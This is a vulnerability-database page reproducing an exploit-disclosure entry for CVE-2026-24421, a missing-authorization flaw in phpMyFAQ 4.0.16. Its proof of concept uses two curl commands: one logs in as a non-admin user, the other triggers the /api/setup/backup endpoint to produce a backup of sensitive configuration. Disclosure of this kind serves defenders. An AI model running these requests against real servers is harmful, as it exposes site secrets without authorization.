Vulners
Lucene search
phpMyFAQ 4.0.16 - Improper Authorization
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2026-24421 | 24 Jan 202601:43 | – | attackerkb |
 | CVE-2026-24421 | 23 Jan 202619:02 | – | circl |
 | phpMyFAQ security vulnerabilities | 24 Jan 202600:00 | – | cnnvd |
 | CVE-2026-24421 | 24 Jan 202601:43 | – | cve |
 | CVE-2026-24421 phpMyFAQ missing authorization exposes /api/setup/backup to any authenticated user | 24 Jan 202601:43 | – | cvelist |
 | EUVD-2026-4258 | 24 Jan 202601:43 | – | euvd |
 | phpMyFAQ: /api/setup/backup accessible to any authenticated user (authz missing) | 23 Jan 202620:17 | – | github |
 | CVE-2026-24421 | 24 Jan 202602:15 | – | nvd |
 | CVE-2026-24421 phpMyFAQ missing authorization exposes /api/setup/backup to any authenticated user | 24 Jan 202601:43 | – | osv |
| GHSA-WM8H-26FV-MG7G phpMyFAQ: /api/setup/backup accessible to any authenticated user (authz missing) | 23 Jan 202620:17 | – | osv |
10
# Exploit Title: phpMyFAQ <= 4.0.16 - Improper Authorization
# Google Dork: N/A
# Date: 2026-01-23
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: https://www.phpmyfaq.de/
# Software Link: https://www.phpmyfaq.de/download/
# Version: <= 4.0.16 (REQUIRED)
# Tested on: Ubuntu 22.04, Apache 2.4.52, PHP 8.2.x, MariaDB 10.6.x
# CVE: CVE-2026-24421
## Summary
Authenticated non-admin users can call /api/setup/backup and trigger a configuration backup. The endpoint checks authentication but does not enforce authorization (missing configuration/admin permission check), and returns a link/path to the generated ZIP.
## Details
SetupController.php uses userIsAuthenticated() but does not verify that the requester has configuration/admin permissions. This allows any logged-in user to create a sensitive backup and retrieve its path.
## PoC
Precondition: API enabled, any authenticated non-admin user.
1) Log in as a non-admin user:
curl -c /tmp/pmf_api_cookies.txt \
-H 'Content-Type: application/json' \
-d '{"username":"tester","password":"Test1234!"}' \
http://192.168.40.16/phpmyfaq/api/v3.0/login
2) Trigger backup generation:
curl -i -b /tmp/pmf_api_cookies.txt \
-X POST --data '4.0.16' \
http://192.168.40.16/phpmyfaq/api/setup/backup
## Expected Result
The API responds successfully and includes a link/path to the generated ZIP backup even though the caller is not an admin / does not have configuration-edit permissions.
## Impact
Low-privileged users can generate sensitive backups. If the ZIP is web-accessible (server misconfiguration), this can lead to exposure of secrets/configuration and facilitate follow-on compromise.
## References
- GitHub Advisory: GHSA-wm8h-26fv-mg7gData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Apr 2026 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.16.5
EPSS0.00266
SSVC